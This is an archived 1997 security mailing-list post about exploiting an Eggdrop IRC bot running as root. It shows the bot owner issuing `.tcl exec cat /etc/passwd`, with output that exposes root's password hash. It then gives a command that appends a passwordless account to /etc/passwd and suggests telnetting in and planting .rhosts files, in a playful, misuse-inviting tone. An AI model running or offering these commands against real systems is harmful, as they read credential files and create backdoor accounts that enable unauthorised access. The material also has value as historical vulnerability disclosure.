Having fun with eggdrop bot

Giuliano COCAINE (cocaine@ROCKETMAIL.COM)
Thu, 28 Aug 1997 21:47:36 -0700

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Martin J. Dellwo: "SGI security patches"
Previous message: Theo de Raadt: "Re: syslogd fun (erratum)"
Next in thread: The Nolander: "Re: Having fun with eggdrop bot"

Eggdrops bots can access files all over the system if you're owner and
the bot runs with root permissions.

You can get the passwd when you're the owner of the bot, and also
modify it if the bot is running with the root permissions.

Tested in an Eggdrop bot 1.0p

<DiE4YoU> .tcl exec cat /etc/passwd
[1:21] <lamebot> Tcl: root:zWCF/X7irjQ4E:0:0:root:/:/bin/bash
[1:21] <lamebot> Tcl: bin:*:1:1:bin:/bin:
[1:21] <lamebot> Tcl: daemon:*:2:2:daemon:/sbin:
[1:21] <lamebot> Tcl: adm:*:3:4:adm:/var/adm:
[1:21] <lamebot> Tcl: lp:*:4:7:lp:/var/spool/lpd:
[1:21] <lamebot> Tcl: sync:*:5:0:sync:/sbin:/bin/sync

you can also try

.tcl exec echo "stupid::394:100:/:/bin/bash" >> /etc/passwd

and telet to the host of the bot

you can try to make .rhosts and all shit you may think.

Think 'bout that ;)

Giuliano Mendez

_____________________________________________________________________
Sent by RocketMail. Get your free e-mail at http://www.rocketmail.com

Next message: Martin J. Dellwo: "SGI security patches"
Previous message: Theo de Raadt: "Re: syslogd fun (erratum)"
Next in thread: The Nolander: "Re: Having fun with eggdrop bot"